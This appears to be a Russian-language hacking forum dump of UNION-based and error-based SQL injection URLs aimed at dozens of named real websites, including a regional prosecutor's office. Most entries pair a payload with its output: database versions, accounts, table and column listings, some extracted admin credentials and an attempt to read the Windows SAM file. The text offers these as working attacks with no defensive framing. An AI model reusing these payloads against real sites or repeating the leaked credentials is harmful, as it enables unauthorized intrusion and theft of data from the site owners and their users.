IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
CONSTRAINT_CATALOG,
CONSTRAINT_SCHEMA,
CONSTRAINT_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,
REFERENCED_TABLE_NAME,
REFERENCED_COLUMN_NAME,
QUERY_ID,
SEQ,
STATE,
DURATION,
CPU_USER,
CPU_SYSTEM,
CONTEXT_VOLUNTARY,
CONTEXT_INVOLUNTARY,
BLOCK_OPS_IN,
BLOCK_OPS_OUT,
MESSAGES_SENT,
MESSAGES_RECEIVED,
PAGE_FAULTS_MAJOR,
PAGE_FAULTS_MINOR,
SWAPS,
SOURCE_FUNCTION,
SOURCE_FILE,
SO

http://lifestyle.bosnia.ba/index.php?sta=3&pid=-13817+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

www.ankenyalumni.org/pages.php?id=54 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7--
Host IP: 199.108.163.173
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5 :p
Current DB: ankenyalumni

www.rhinos.com.au/pages.php?id=4 UNION ALL SELECT 1,%String_Col%,3,4--
Host IP: 203.80.162.200
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=4.1
Current DB: rhinos

www.brightworks.net/pages.php?id=workshops AND %True_Expression% AND 'x'='x
Host IP: 98.129.111.26
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: brightworks_site

:p :p

http://www.histonfc.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,vers ion(),10,11+from+news--
http://www.ng2.co.uk/news.php?id=1&newsid=9999+union+select+1,2,3,4,5,6,concat_ws(0x3 a,username,password,email)+from+users--
http://graysathletic.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,10 ,email+from+users/*
http://www.henleystandard.co.uk/news/news.php?id=99999+union+select+1,2,3,4,5,6,table_n ame,8,9,10,11+from+information_schema.tables+limit +17,1--
adfeature_text adfeature_upsell archive archivemedia breaking_news
comments displayads editorial editorschoice emails faceforradio hsotv
jobs jobs_new lineage media notices schools schoolsnews sitsvac
http://www.airdrie007seacadets.co.uk/news.php?id=999+union+select+1,concat_ws(0x3a,name ,pass,email),3,4,5,6,7,8,9+from+users--
http://lpoolcomp.co.uk/news.php?id=999+union+select+1,2,3,4,concat_ws(0x3 a,username,password,email),6,7,8,9,10+from+users+l imit+1,1--
http://www.wrightinvestments.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6+ from+information_schema.tables+limit+17,1--
IP_LOG gen_sets sessions stoContact tblCommercialNews tblCommercialPages
tblContacts tblDesign tblEngineeringPages tblFinancePages tblFinanceTestimonials tblGallery tblInvestNews tblInvestPages
tblLivingNews tblLivingPages tblLocationGallery tblMeta tblPDF tblPages blProperty tblSpec tblSpecGallery tblStoragePages tblStorageTestimonials tblSupplyPages tblTradePages tblTypes tblWri wlv_tblProperty wriContact
http://www.spygenius.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6, 7+from+information_schema.tables+limit+17,1--
advice alan_page audio_page gigs_page home_page links_page news_page photos_page press_page shop_page
http://www.prologisstafford.co.uk/news.php?id=18&newsid=999+union+select+1,2,3,4,5,6,concat_ws(0x3a ,username,password,email)+from+users--
http://www.michaellaird.co.uk/michael-laird-news.php?id=7+union+select+1,2,3,4,5,6,table_name, 8,9+from+information_schema.tables+limit+17,1--
awardcategories awards categories clients homebanner news pages people
photos portfolio press recruitment
http://www.beebeedevelopments.co.uk/news.php?id=9000019+union+select+1,2,3,4,5,6,table _name,8,9,10,11+from+information_schema.tables+lim it+17,1--
main pdf prop d spWebPartsSiteLog
http://www.lichfields.co.uk/news.php?id=99999+union+select+1,2,3,4,version(),6 ,7,8,9,10,11,12,13,14,15,16,17+from+clients--
http://www.physicaljerks.co.uk/news.php?id=99999+union+select+1,2,3,table_name,5, 6,7,8,9,10,11,12,13,14+from+information_schema.tab les+limit+28,1--
GDN_Activity GDN_ActivityType GDN_Category GDN_Comment GDN_CommentWatch
GDN_Conversation GDN_ConversationMessage GDN_Discussion GDN_Draft GDN_Invitation GDN_Message GDN_Permission GDN_Photo GDN_Role GDN_ThemeSetting
GDN_User GDN_UserAuthentication GDN_UserConversation GDN_UserDiscussion GDN_UserRole LUM_Attachment LUM_Attachment LUM_Category LUM_CategoryBlock
LUM_CategoryRoleBlock LUM_Comment LUM_Discussion LUM_DiscussionUserWhisperFrom LUM_DiscussionUserWhisperTo LUM_IpHistory
LUM_Notify LUM_Role LUM_Style LUM_User LUM_UserBookmark LUM_UserDiscussionWatc
http://www.bkbluebird.co.uk/news.php?id=9999+union+select+1,2,3,version(),5,6--

http://www.oasis-gidro.ru/news.php?id=99+union+select+1,COLUMN_NAME,3,4+FROM +INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6f6 17a69735f7573657273+LIMIT+1,3%20--
u19255@10.10.223.208:u19255:5.0.67-log

А ВОТ ПРОКУРАТУРА КУРСКОЙ ОБЛАСТИ...

http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_en crypt(concat_ws(0x3a,@@version,user(),database(),@ @version_compile_os),0x71),0x71),5,6+--

version : 5.0.16-standard-log
user : prosecutor@ns.kursktelecom.ru
database : ProsecutoryDB
os : pc-linux-gnu
http://www.prockurskobl.ru/text.php?id=-1690+and+1=2+union+select+1,2,3,aes_decrypt(aes_en crypt(group_concat(login,0x3a,hash+SEPARATOR+0x0b) ,0x71),0x71),5,6+from+auth--

http://www.basw-ngo-by.net/page.php?issue_id=-292+union+select+1,2,3,4--

user(): BASWNGOBYNET@LOCALHOST
version(): 5.0.51A-24+LENNY1-LOG
database(): BASWNGOBYNET
OS: DEBIAN-LINUX-GNU

Сайт: http://www.laktomir-nsk.ru
ТИЦ: 10
PR: 1
Пример запроса: http://www.laktomir-nsk.ru/index3.php?id=-23+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os)--+
version - 5.0.90-community
user - ipdenis_admin@localhost
database - ipdenis_laktomir
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
cute_categories,
cute_comments,
cute_flood,
cute_ipban,
cute_news,
cute_story,
cute_users,
categg,
email,
files,
kapital_zed_admin_menu,
kapital_zed_articles,
kapital_zed_brotator,
kapital_zed_category,
kapital_zed_form,
kapital_zed_news,
kapital_zed_pages,
kapital_zed_redirect,
kapital_zed_site_menu,
kapital_zed_siteinfo,
kapital_zed_tplblock,
kapital_zed_tplmanager,
kapital_zed_users,
tovari,
zed_news,
zed_news2,
cute_categories,
cute_comments,
cute_flood,
cute_ipban,
cute_news,
cute_story,
cute_users,
files,
kapital_zed_admin_menu,
kapital_zed_articles,
kapital_zed_brotator,
kapital_zed_category,
kapital_zed_form,
kapital_zed_news,
kapital_zed_pages,
kapital_zed_redirect,
kapital_zed_site_menu,
kapital_zed_siteinfo,
kapital_zed_tplblock,
kapital_zed_tplman

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
CONSTRAINT_CATALOG,
CONSTRAINT_SCHEMA,
CONSTRAINT_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,
REFERENCED_TABLE_NAME,
REFERENCED_COLUMN_NAME,
QUERY_ID,
SEQ,
STATE,
DURATION,
CPU_USER,
CPU_SYSTEM,
CONTEXT_VOLUNTARY,
CONTEXT_INVOLUNTARY,
BLOCK_OPS_IN,
BLOCK_OPS_OUT,
MESSAGES_SENT,
MESSAGES_RECEIVED,
PAGE_FAULTS_MAJOR,
PAGE_FAULTS_MINOR,
SWAPS, SOURCE_FUNCTION,
SOURCE_FILE,
SO
=========================================
Сайт: http://www.spectehsnab.ru
ТИЦ: 0
PR: 2
Пример запроса: http://www.spectehsnab.ru/index3.php?id=251+or+(select+count(*)+from+(select +1+union+select+2+union+select+3)x+group+by+concat (mid(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.0.38-Ubuntu_ubuntu-log
user - apache@localhost
database - spectehsnab
os - pc-linux-gnu

=========================================

Сайт: http://www.tectoria.co.jp
ТИЦ: 0
PR: :confused:
Пример запроса: http://www.tectoria.co.jp/products/index3.php?id=1'+and+1=cast((SELECT+version()||chr (58)||current_user||chr(58)||current_database())+a s+int)--&cnt=
version - PostgreSQL 7.3.15 on i686-pc-linux-gnu, compiled by GCC 2.96
user - s06010103
database - products_DB
os - pc-linux-gnu

MySQL 4.1.14-nt
серв на винде
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_c oncat(0x3a,user,0x3a,password,0x3a,file_priv))),11 ,12+from+mysql.user+--
резалт

:root:*0га:Y
лоадим файл SAM
http://www.naranjeros.com.mx/detalle-col.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,hex(load_file(0x6 33a2f77696e646f77732f7265706169722f73616d)),11,12+ from+mysql.user+--
в hex

http://www.wbstraining.com/php/events/showevent.php?id=-157+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database(),@@version_compile_os),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23+from+infor mation_schema.tables

Сайт: http://www.cosmicus.nl
ТИЦ: 10
PR: 5
Пример запроса: http://www.cosmicus.nl/site/index3.php?id=-186+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),3,4,group_concat (0x0b,table_name),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30+from+inform ation_schema.tables--+
version - 5.0.24a-standard
database - cmcuser@localhost
user - cosmicus
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
11_afdeling,
11_bestuur,
11_bestuur_controle,
22_cms,
23_cms_page,
24_projecten,
4images_categories,
4images_comments,
4images_groupaccess,
4images_groupmatch,
4images_groups,
4images_images,
4images_images_temp,
4images_lightboxes,
4images_postcards,
4images_sessions,
4images_sessionvars,
4images_settings,
4images_users,
4images_wordlist,
4images_wordmatch,
99_cms,
advertenties,
afdeling,
agenda,
agenda_type,
ap_poll,
ap_settings,
ap_theme,
ap_users,
ap_votes,
artikels,
auteurs,
bestuur,
bestuur_edit,
blad,
cmc_banner,
cmc_bannerclient,
cmc_bannerfinish,
cmc_categories,
cmc_components,
cmc_contact_details,
cmc_content,
cmc_content_frontpage,
cmc_content_rating,
cmc_core_acl_aro,
cmc_core_acl_aro_groups,
cmc_core_acl_aro_sections,
cmc_core_acl_groups_aro_map,
cmc_core_l

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
CONSTRAINT_CATALOG,
CONSTRAINT_SCHEMA,
CONSTRAINT_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,
REFERENCED_TABLE_NAME,
REFERENCED_COLUMN_NAME,
SPECIFIC_NAME,
ROUTINE_CATALOG,
ROUTINE_SCHEMA,
ROUTINE_NAME,
ROUTINE_TYPE,
DTD_IDENTIFIER,
ROUTINE_BODY,
ROUTINE_DEFINITION,
EXTERNAL_NAME,
EXTERNAL_LANGUAGE,
PARAMETER_STYLE,
IS_DETERMINISTIC,
SQL_DATA_ACCESS,
SQL_PATH,
SECURITY_TYP
==================================

Сайт: http://www.film.ua
ТИЦ: 50
PR: 4
Примеры запросов: http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+or+(select+count(*)+from+(select+1+union+select +2+union+select+3)x+group+by+concat(mid(version(), +1,+63),+floor(rand(0)*2)))--+
http://www.film.ua/production/index3.php?option=com_content&task=view&id=-1'+union+select+1,2--+
Нужна рега ^^

version - 5.0.84-log
user - film2@localhost
database - film2
os - pc-linux-gnu

http://www.zideo.nl/index.php?option=com_content&id=-142+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29--

User: root@localhost
Version: 5.0.51a-community-nt-log
Database: admin_zideo

Google PR: 5

Какойто касяк с админкой!

прямо к админу

http://dyadem.it/media/pr.php?id=-34+union+select+1,2,3,4,concat(username,char(58),p assword)+from+calendar.users+limit+0,1--

http://www.ruslana.ua/en/press.php?ln=2&pr=1+and+1=0+union+select+concat%280x5b,0x4d,0x61, 0x63,0x68,0x69,0x6e,0x65,0x3a,0x20,@@version_compi le_machine,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b ,0x4f,0x53,0x20,0x3a,0x20,@@version_compile_os,0x2 0,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0x4 2,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x3a,0x2 0,0x20,@@version,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x2 0,0x5b,0x20,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x2 0,0x43,0x6f,0x6d,0x6d,0x65,0x6e,0x74,0x3a,0x20,@@v ersion_comment,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20, 0x5b,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x55, 0x73,0x65,0x72,0x3a,0x20,system_user%28%29,0x20,0x 5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x48,0x6f,0x 73,0x74,0x6e,0x61,0x6d,0x65,0x3a,0x20,@@hostname,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x44,0 x61,0x74,0x61,0x44,0x69,0x72,0x3a,0x20,@@datadir,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x42,0 x61,0x73,0x65,0x64,0x69,0x72,0x3a,0x20,@@basedir,0 x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x74,0 x6d,0x70,0x20,0x44,0x69,0x72,0x3a,0x20,@@tmpdir,0x 20,0x5d,0x20,0x2d2d,0x2d,0x20,0x5b,0x20,0x44,0x61, 0x74,0x61,0x62,0x61,0x73,0x65,0x3a,0x20,database%2 8%29,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20, 0x53,0x74,0x6f,0x72,0x61,0x67,0x65,0x20,0x45,0x6e, 0x67,0x69,0x6e,0x65,0x3a,0x20,@@storage_engine,0x2 0,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x5 1,0x4c,0x20,0x57,0x61,0x72,0x6e,0x69,0x6e,0x67,0x7 3,0x3a,0x20,@@sql_warnings,0x20,0x5d,0x20,0x2d,0x2 d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x72,0x76,0x65,0x7 2,0x20,0x49,0x44,0x3a,0x20,@@server_id,0x20,0x5d,0 x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x4c,0x69,0x63,0 x65,0x6e,0x73,0x65,0x3a,0x20,@@license,0x20,0x5d,0 x20,0x2d,0x2d,0x2d,0x20,0x5b,0x20,0x53,0x65,0x63,0 x75,0x72,0x65,0x20,0x41,0x75,0x74,0x68,0x3a,0x20,@ @secure_auth,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x20,0x 5b,0x20,0x45,0x78,0x70,0x69,0x72,0x65,0x20,0x4c,0x 6f,0x67,0x73,0x20,0x44,0x61,0x79,0x73,0x3a,0x20,@@ expire_logs_days,0x20,0x5d,0x20,0x2d,0x2d,0x2d,0x2 0,0x5b,0x20,0x4c,0x6f,0x67,0x20,0x57,0x61,0x72,0x6 e,0x69,0x6e,0x67,0x73,0x3a,0x20,@@log_warnings,0x2 0,0x5d,0x20,0x20,0x20,0x2d,0x2d,0x2d,0x20,0x5b,0x2 0,0x53,0x79,0x73,0x74,0x65,0x6d,0x20,0x54,0x69,0x6 d,0x65,0x20,0x5a,0x6f,0x6e,0x65,0x3a,0x20,@@system _time_zone,0x5d,0x20,0x2d,0x2d,0x2d,0x2d,0x2d,0x20 ,0x5b,0x20,0x54,0x69,0x6d,0x65,0x20,0x5a,0x6f,0x6e ,0x65,0x3a,0x20,@@time_zone,0x20,0x5d%29--


[Machine: i386 ] --- [OS : portbld-freebsd6.3 ] --- [ DB Version: 5.0.90 ] --- [ Version Comment: FreeBSD port: mysql-server-5.0.90 ] --- [ System User: root@localhost ] --- [ Hostname: ruslana.ua ] --- [ DataDir: /var/db/mysql/ ] --- [ Basedir: /usr/local/ ] --- [ tmp Dir: /var/tmp/ ] --- [ Database: ruslana ] --- [ Storage Engine: MyISAM ] --- [ SQL Warnings: 0 ] --- [ Server ID: 1 ] --- [ License: GPL ] --- [ Secure Auth: 0 ] --- [ Expire Logs Days: 0 ] --- [ Log Warnings: 1 ] --- [ System Time Zone: UTC] ----- [ Time Zone: SYSTEM ]

http://www.bcspeakers.com/product.php?id=-0000000046+union+select+1,2,3,4,5,6,concat(usernam e,char(58),password),8,9,10,11,12,13,14,15+from+_u ser--

http://www.estaciontierra.com/artistas/artista.php?id=-164+union+select+1,2,3,4,5,user(),7,8,9,@@version_ compile_os,11,database(),version(),14--

http://www.webjournal.unior.it/Articoli.php?IdVolume=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat( name,char(58),password)+from+admin--

http://www.databankgroup.com/index1.php?linkid=-999+union+SELECT+GROUP_CONCAT(table_name)+FROM+inf ormation_schema.tables--

pr5

http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9/*

pr6

http://telemex.ru//index.php?category=-1+union+all+select+1,2,3,concat_ws(0x3a,@@version, user(),database(),@@version_compile_os),5+--

version : 5.1.34
user : reee_biz@localhost
database : reee_biz
os : linux-gnu

http://www.homegate.ru/board?code=show&id=-28409+union+select+1,2,3,4,5,6,concat_ws(0x3a,nick ,hash,salt,email),8,9,10,11,12,13,14+from+neway_us ers--
PR:3
ТиЦ:50
Посещалка:1,5к-2к в сутки.

http://www.samenta.ru/catalog/?lang=rus&c_id=1&p_id=-1+union+select+1,2,3,4,concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os),6,7,8,9,10,1 1,12,13,14,15,16,17+--

version : 4.0.26
user : samentaru@samenta.ru
database : samentaru
os : unknown-freebsd6.1

http://www.bcspeakers.com/product.php?id=-11+union+select+1,concat(username,0x3a,password),3 ,4,5,6,7,8,9,10,11,12,13,14,15+from+_user--

lcd:lcd2008
bcadmin:bc2008

http://market.remont99.ru/news.php?id=-16+union+all+select+1,concat_ws(0x3a,@@version,use r(),database(),@@version_compile_os),3,4,5,6,7+--

version : 4.1.25-log
user : remont94_olga@localhost
database : remont94_db
os : portbld-freebsd6.3

http://www.ayrshireandgalloway.co.uk/news.php?id=99999+union+select+1,2,3,4,5--
http://www.treatbalham.co.uk/news.php?id=99999+union+select+1,2,version(),4,5,6 +from+news--
http://www.saintstrust.co.uk/news.php?id=99999+union+select+1,2,3,4,5,concat_ws (0x3a,username,password,email),7,8+from+t_user+lim it+0,1--
http://www.vibixa.co.uk/news.php?id=9999+union+select+1,table_name,3,4,5,6 +from+information_schema.tables+limit+17,1--
career category client colour gallery_image garden_accessories link order_head
page roof_style seating_upholstery summerhouse summerhouse_has_colour summerhouse_has_garden summerhouse_has_garden_order summerhouse_has_roof
summerhouse_has_seating
http://connexions.oberon.titaninternet.co.uk/news.php?id=9999+union+select+1,2,version(),4,5--
http://www.arbroathpool.co.uk/news.php?id=99999+union+select+1,2,version()+from+ news--
http://www.kentonvineyard.co.uk/news.php?id=999+union+select+1,2,3,4,table_name,6, 7,8+from+information_schema.tables+limit+17,1--
gst_events gst_news gst_products
http://www.staddonheightsgolf.co.uk/news.php?id=999+union+select+1,2,3,4,table_name,6, 7,8,9,10+from+information_schema.tables+limit+28,1--
wcusers:username wcusers:password wcusers:ip //но таблица пуста.
http://www.docbrown.co.uk/news.php?id=999+union+select+1,2,version(),4+news--
http://www.rimrecords.co.uk/rim-news.php?id=9999+union+select+1,2,3,version()--
http://www.krehalonuk.co.uk/news.php?id=9999+union+select+1,2,3,version(),5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19+from+news--

http://www.forceofnature.org/events.php?id=-36+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),10--+

version:5.0.45-log
user:fonadmin@cgi0506.int.bizland.net

Сайт: http://www.travellux.com
ТИЦ: 70
PR: 4
Пример запроса: http://www.travellux.com/index4.php?mode=57&select=about_us&id=-1364'+union+select+1,2,3,concat_ws(0x0b,version(), user(),database(),@@version_compile_os),group_conc at(0x0b,id,0x3a,name,0x3a,email,0x3a,password),nul l,null,8,9,10,11,12,13,14,15,16,17+from+users--+
version - 5.0.84-log
user - travell@localhost
database - travell00
os - portbld-freebsd6.1
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
abroad,
allCodes,
articles,
categ,
consultations,
countries,
data_turs,
datehotels,
dates,
documents,
down,
hotels,
images,
menu_left,
operators,
parameters,
parts,
prices,
quest_busy,
questions,
registry,
registryold,
sites,
timetable,
users

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA, PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
CONSTRAINT_CATALOG,
CONSTRAINT_SCHEMA,
CONSTRAINT_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,
REFERENCED_TABLE_NAME,
REFERENCED_COLUMN_NAME,
QUERY_ID,
SEQ,
STATE,
DURATION,
CPU_USER,
CPU_SYSTEM,
CONTEXT_VOLUNTARY,
CONTEXT_INVOLUNTARY,
BLOCK_OPS_IN,
BLOCK_OPS_OUT,
MESSAGES_SENT,
MESSAGES_RECEIVED,
PAGE_FAULTS_MAJOR,
PAGE_FAULTS_MINOR,
SWAPS,
SOURCE_FUNCTION,
SOURCE_FILE,
SO
=========================================

Сайт: http://www.tangotiger.net
ТИЦ: 10
PR: 3
Пример запроса: http://www.tangotiger.net/scout/index4.php?teamid=-114+union+select+concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),group_concat(0x0b, column_name),3,4,null,null,7,null,null,now(),null, null,null,null,null,null+from+information_schema.c olumns--+
version - 5.0.67-log
user - scoudb@redbull.dreamhost.com
database - scoudb
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
BALLOTS,
CHECKSUM_FAN,
CHECKSUM_FAN_DUPS,
CHECKSUM_FAN_IPADDR,
CHECK_VOTES,
CHECK_VOTE

columns:

CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMER
=========================================

Сайт: http://artem.ip-nsk.ru
ТИЦ: 0
PR: 0
Пример запроса: http://artem.ip-nsk.ru/tdk/index4.php?idd=-53+union+select+1,group_concat(0x0b,id,0x3a,userna me,0x3a,password),3,null,5,6,7,8,9,10+from+cute_us ers--+
version - 5.0.90-community
user - ipdenis_admin@localhost
database - ipdenis_tdk
os - pc-linux-gnu
tables:

CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
cute_categories,
cute_comments,
cute_flood,
cute_ipban,
cute_news,
cute_story,
cute_users,
categg,
email,
files,
kapital_zed_admin_menu,
kapital_zed_articles,
kapital_zed_brotator,
kapital_zed_category,
kapital_zed_form,
kapital_zed_news,
kapital_zed_pages,
kapital_zed_redirect,
kapital_zed_site_menu,
kapital_zed_siteinfo,
kapital_zed_tplblock,
kapital_zed_tplmanager,
kapital_zed_users,
tovari,
zed_news,
zed_news2,
cute_categories,
cute_comments,
cute_flood,
cute_ipban,
cute_news,
cute_story,
cute_users,
files,
kapital_zed_admin_menu,
kapital_zed_articles,
kapital_zed_brotator,
kapital_zed_category,
kapital_zed_form,
kapital_zed_news,
kapital_zed_pages,
